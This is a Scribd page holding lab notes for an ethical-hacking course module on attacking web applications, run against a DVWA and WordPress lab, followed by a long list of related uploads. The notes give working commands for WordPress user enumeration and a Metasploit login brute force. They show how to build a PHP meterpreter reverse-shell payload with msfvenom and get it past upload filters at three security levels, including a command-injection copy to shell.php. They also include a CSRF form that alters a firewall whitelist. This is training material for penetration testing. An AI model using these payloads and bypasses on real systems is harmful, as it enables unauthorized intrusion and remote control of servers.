Module14 Hacking Web Applications

This document outlines various techniques for hacking web applications, including exploiting parameter tampering, XSS vulnerabilities, and remote command execution. It details the use of tools like WPScan, Metasploit, Vega, and Acunetix WVS for vulnerability scanning and exploitation. Additionally, it covers methods for file upload vulnerabilities and performing CSRF attacks to manipulate web application settings.

Uploaded by

Aamir Khan

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

5 views3 pages

Module14 Hacking Web Applications

Uploaded by

Aamir Khan

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 3

Module 14: Hacking Web Applications

Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications

Parameter tampering
Cross-site scripting (XSS or CSS) - inject client-side scripts

Enumerating and Hacking a Web Application Using WPScan and Metasploit

In Kali Linux, WPScan --url http://[IP Address of Windows Server
2012]:8080/CEH --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE /root/Desktop/Wordlists/Passwords.txt
set RHOSTS [IP Address of Windows Server 2012]
set RPORT 8080
set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/
set USERNAME admin (or any user obtained with WPScan)
run

Exploiting Remote Command Execution Vulnerability to Compromise a Target Web Server

Auditing Web Application Framework Using Vega

In Kali Linux, Applications --> 03 - Web Application Analysis --> Vega
Injection Modules + Response Processing Modules

Website Vulnerability Scanning Using Acunetix WVS

Business Criticality - High
Full Scan/ OWASP Top 10/ Instant

Exploiting File Upload Vulnerability at Different Security Levels

In Kali Linux, msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11
lport=4444 -f raw
Use Leafpad to save payload in to upload.php
http://10.10.10.12:8080/dvwa/login.php
DVWA Security > Low
File Upload > upload.php
msfconsole
use multi/handler
show options
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.11
set lport 4444
run
http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php
session is created automatically, if not: sessions -i 1
sysinfo
close all

DVWA Security > Medium

File Upload > upload.php returns error
Rename payload to upload.php.jpg
Setup Burp Suite as an intercepting proxy
Upload the file upload.php.jpg
In Burp Suite, rename filename to upload.php
Upload is success. Remove proxy from browser
msfconsole
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.11
set lport 4444
run
http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php
session is created automatically, if not: sessions -i 1
sysinfo
close all

DVWA Security > High

File Upload > upload.php returns error
Rename payload back to upload.php
With a text editor, Put GIF98 as first line.
Rename payload to upload.jpg
Upload is success
DVWA > Command Injection
|copy C:\wamp64\www\DVWA\hackable\uploads\upload.jpg C:\wamp64\www\DVWA\
hackable\uploads\shell.php
msfconsole
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.11
set lport 4444
run
http://10.10.10.12:8080/dvwa/hackable/uploads/shell.php
session is created automatically, if not: sessions -i 1
sysinfo
close all

Performing Cross-Site Request Forgery (CSRF) Attack (one-click attack or session

riding)
In Windows 2012, http://10.10.10.12:8080/CEH/wp-login.php, Login as admin
Plugins > Wordpress Firewall 2 > Whitelist 10.10.10.12
In Kali Linux, wpscan -u http://10.10.10.12:8080/CEH --enumerate vp
Save this script as Security_Script.html

<form method="POST"
action="http://10.10.10.12:8080/CEH/wp-admin/optionsgeneral.php?page=wordpress-
firewall-2%2Fwordpress-firewall-2.php">
<script>alert("As an Admin, To enable additional security to your Website.
Click Submit")</script>
<input type="hidden" name="whitelisted_ip[]" value="10.10.10.11" >
<input type="hidden" name="set_whitelist_ip" value="Set Whitelisted IPs"
class="button-secondary">
<input type="submit">
</form>

Share Security_Script.html with Windows 2012(over smb:// share), open in WP

logged in browser and click submit
Observe in Wordpress Firewall 2, Whitelisted IP changed to 10.10.10.11.

Using Web Proxies
100% (1)
Using Web Proxies
31 pages
Imagen Turbo-Compresor Solar
No ratings yet
Imagen Turbo-Compresor Solar
2 pages
Best Ethical Hacking Roadmap 2024
No ratings yet
Best Ethical Hacking Roadmap 2024
14 pages
Pco2
No ratings yet
Pco2
55 pages
WordPress Penetration Testing
No ratings yet
WordPress Penetration Testing
14 pages
DVWA Medium Level Report
No ratings yet
DVWA Medium Level Report
24 pages
From Local File Inclusion To Reverse Shell - by A3h1nt - Medium
No ratings yet
From Local File Inclusion To Reverse Shell - by A3h1nt - Medium
20 pages
Agency Accelerator Week
No ratings yet
Agency Accelerator Week
1 page
Office of The Sangguniang Kabataan
No ratings yet
Office of The Sangguniang Kabataan
5 pages
Lab 11
No ratings yet
Lab 11
12 pages
Advanced Pentesting and Forensics
No ratings yet
Advanced Pentesting and Forensics
15 pages
Carron, Brawley
No ratings yet
Carron, Brawley
18 pages
DVWA PENTESTING LAB Part 1
100% (1)
DVWA PENTESTING LAB Part 1
6 pages
5.hmt-B19162a-M02 - Piping Diagram of Ballast Water System - 1.0
No ratings yet
5.hmt-B19162a-M02 - Piping Diagram of Ballast Water System - 1.0
6 pages
OSCP Lab & Exam Guide
100% (1)
OSCP Lab & Exam Guide
24 pages
Rbi Script - Plaza, Marvin - G11 Math - Q1-W2
100% (2)
Rbi Script - Plaza, Marvin - G11 Math - Q1-W2
6 pages
Venomous Write-Up: Nginx
No ratings yet
Venomous Write-Up: Nginx
9 pages
Web Attacks
No ratings yet
Web Attacks
7 pages
Audi 80/90 Wiring Diagram Guide
No ratings yet
Audi 80/90 Wiring Diagram Guide
20 pages
Guide To OSCP in 2021
No ratings yet
Guide To OSCP in 2021
1 page
Oswe Notes Basic by Joas 1648716052
No ratings yet
Oswe Notes Basic by Joas 1648716052
233 pages
Luke's Ultimate OSCP Guide Part
100% (2)
Luke's Ultimate OSCP Guide Part
18 pages
Got It! I'Ll Make It More Hands-On With Specific Steps and Tools To Ensure It's
No ratings yet
Got It! I'Ll Make It More Hands-On With Specific Steps and Tools To Ensure It's
2 pages
Types of Construction Slabs: By: Ar. Parul Jain
No ratings yet
Types of Construction Slabs: By: Ar. Parul Jain
8 pages
7MWTW1500AQ0
No ratings yet
7MWTW1500AQ0
8 pages
Week8
No ratings yet
Week8
5 pages
Lab 11
No ratings yet
Lab 11
13 pages
OMRON PLC Cable Guide
No ratings yet
OMRON PLC Cable Guide
2 pages
Lab 1: Backdoor Attacks: Exercise 1: Exploiting Port 21: FTP
100% (1)
Lab 1: Backdoor Attacks: Exercise 1: Exploiting Port 21: FTP
4 pages
Masbate City School Canvass Summary
No ratings yet
Masbate City School Canvass Summary
2 pages
EJPT9
No ratings yet
EJPT9
3 pages
Advance Ethical Hacking Bug Bounty Hunting & Penetration Testing PDF
No ratings yet
Advance Ethical Hacking Bug Bounty Hunting & Penetration Testing PDF
17 pages
Simplicrack Reasoning 2024 PDF
No ratings yet
Simplicrack Reasoning 2024 PDF
5 pages
Day 01 Notes
No ratings yet
Day 01 Notes
8 pages
Module12 Evading IDS Firewalls and Honeypots
No ratings yet
Module12 Evading IDS Firewalls and Honeypots
2 pages
DVWA Report
No ratings yet
DVWA Report
16 pages
Dynex Technologies DSX Troubleshooting Guide: Tip Pick-up/Eject Errors
No ratings yet
Dynex Technologies DSX Troubleshooting Guide: Tip Pick-up/Eject Errors
3 pages
Jerry
No ratings yet
Jerry
5 pages
Workshop 0x09 - Web Application Part 2 - Cybersecurity Fundamentals - 3308 - 7308 (2024 S1 - Combined)
No ratings yet
Workshop 0x09 - Web Application Part 2 - Cybersecurity Fundamentals - 3308 - 7308 (2024 S1 - Combined)
20 pages
Ex 6
No ratings yet
Ex 6
12 pages
Cyber Security Internship Report (Beginner)
No ratings yet
Cyber Security Internship Report (Beginner)
18 pages
Ethical Hacking Checklist
No ratings yet
Ethical Hacking Checklist
15 pages
DEFCON - Red Team Village - Station 2
No ratings yet
DEFCON - Red Team Village - Station 2
60 pages
Solving Wicked Problems in Construction
No ratings yet
Solving Wicked Problems in Construction
13 pages
DoS and Session Hijacking
No ratings yet
DoS and Session Hijacking
16 pages
Lab 3
No ratings yet
Lab 3
4 pages
Victim #3 Notes
No ratings yet
Victim #3 Notes
4 pages
Lab 2
No ratings yet
Lab 2
14 pages
Lec 57
No ratings yet
Lec 57
12 pages
Abtik Group
No ratings yet
Abtik Group
23 pages
HER3001PT
No ratings yet
HER3001PT
2 pages
Week 10 Module 6 Product Development
No ratings yet
Week 10 Module 6 Product Development
25 pages
Ig 1685196111
No ratings yet
Ig 1685196111
3 pages
Introduction To Penetration Testing
No ratings yet
Introduction To Penetration Testing
23 pages
Authority To Hire 1
No ratings yet
Authority To Hire 1
4 pages
Ethical Hacking Project Work
No ratings yet
Ethical Hacking Project Work
16 pages
IbrahimBello Pentesting VulnerabilityAssessmentProject
No ratings yet
IbrahimBello Pentesting VulnerabilityAssessmentProject
14 pages
Trick The Wireless User
No ratings yet
Trick The Wireless User
5 pages
Walkthrough 1900
No ratings yet
Walkthrough 1900
12 pages
Assessment
No ratings yet
Assessment
42 pages
HTBWalkthrough Reference
No ratings yet
HTBWalkthrough Reference
3 pages
Survey Questionnaires (SERVQUAL - CUSTOMER SATISFACTION
No ratings yet
Survey Questionnaires (SERVQUAL - CUSTOMER SATISFACTION
6 pages
Local File Inclusion Hacking Tutorial
No ratings yet
Local File Inclusion Hacking Tutorial
8 pages
CSE-224 (Fundamentals of Android)
No ratings yet
CSE-224 (Fundamentals of Android)
2 pages
IPR - Quiz 1 2024
No ratings yet
IPR - Quiz 1 2024
1 page
Philippine Digitalization Bills
No ratings yet
Philippine Digitalization Bills
13 pages
Sapera User
No ratings yet
Sapera User
109 pages
Mehtab Resume
No ratings yet
Mehtab Resume
2 pages
Lab Assignment 04
No ratings yet
Lab Assignment 04
17 pages
Ethical Hacking Attacks Using Kali Linux
No ratings yet
Ethical Hacking Attacks Using Kali Linux
24 pages
ISM - Guidelines For System Management (December 2023)
No ratings yet
ISM - Guidelines For System Management (December 2023)
8 pages
Hospital
No ratings yet
Hospital
23 pages
OWASP Top 10 Lab Manual
No ratings yet
OWASP Top 10 Lab Manual
14 pages
Https Scanning PDF
No ratings yet
Https Scanning PDF
5 pages
Oopsie
No ratings yet
Oopsie
12 pages
CHANDRA DZDA STAT6174037 ProbabilityTheoryandAppliedStatistics
No ratings yet
CHANDRA DZDA STAT6174037 ProbabilityTheoryandAppliedStatistics
17 pages
Brady Ferrule Printer
No ratings yet
Brady Ferrule Printer
5 pages
Instalación DVWA
No ratings yet
Instalación DVWA
14 pages
Windows RCE Exploit Guide
No ratings yet
Windows RCE Exploit Guide
11 pages
File Upload Security for Pentesters
No ratings yet
File Upload Security for Pentesters
59 pages
Elektronik Soalan KVSkills Zon PDF
No ratings yet
Elektronik Soalan KVSkills Zon PDF
19 pages
How To Scan/exploit A SSL Based Webserver. - Version 1.0 21-09-2003
No ratings yet
How To Scan/exploit A SSL Based Webserver. - Version 1.0 21-09-2003
5 pages
eJPT - QuickReference 2
No ratings yet
eJPT - QuickReference 2
34 pages
Week 1 - Web App Testing Basics
No ratings yet
Week 1 - Web App Testing Basics
19 pages
Web Security Lab with Burp Suite
No ratings yet
Web Security Lab with Burp Suite
13 pages
Session 2 VU21997
No ratings yet
Session 2 VU21997
48 pages
ECE312 Final Exam 2021
No ratings yet
ECE312 Final Exam 2021
2 pages
Module13 Hacking Web Servers
No ratings yet
Module13 Hacking Web Servers
1 page
Penetration Test Report
No ratings yet
Penetration Test Report
31 pages
1 Borghello
No ratings yet
1 Borghello
18 pages
Hacking Test
No ratings yet
Hacking Test
42 pages
Module09 Social Engineering
No ratings yet
Module09 Social Engineering
1 page